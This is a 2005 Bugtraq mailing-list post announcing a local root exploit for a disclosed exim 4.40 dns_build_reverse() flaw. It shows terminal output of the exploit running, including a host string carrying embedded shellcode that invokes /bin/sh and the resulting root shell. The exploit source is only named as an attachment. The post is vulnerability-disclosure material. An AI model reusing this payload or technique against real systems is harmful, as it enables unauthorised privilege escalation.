Bugtraq mailing list archives
exim 4.40 exploit
From: "plugger" <plug () internode on net>
Date: Tue, 24 May 2005 23:12:37 +0950
hello punters, I was bored last night so I coded up a local exploit of the dns_build_reverse() vulnerability in exim 4.40. hope no one minds as it was disclosed 5 months ago. tested on exim 4.40 default build with runtime user as root rather than exim or mail - hence the rootshell. see below for versions and system details. "exploit" attached.

regards
plug

============ the details ============

plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!
**** SMTP testing session as if from host ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
**** but without any ident (RFC 1413) callback.
ó
**** This is not for real!
host in host_lookup? yes (matched "*")
looking up host name for ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
IP address lookup using gethostbyaddr()
ó
IP address lookup failed: h_errno=1
LOG: no host name found for IP address ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
sh-2.05b# ó
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$
Attachment:
exim-exploit.c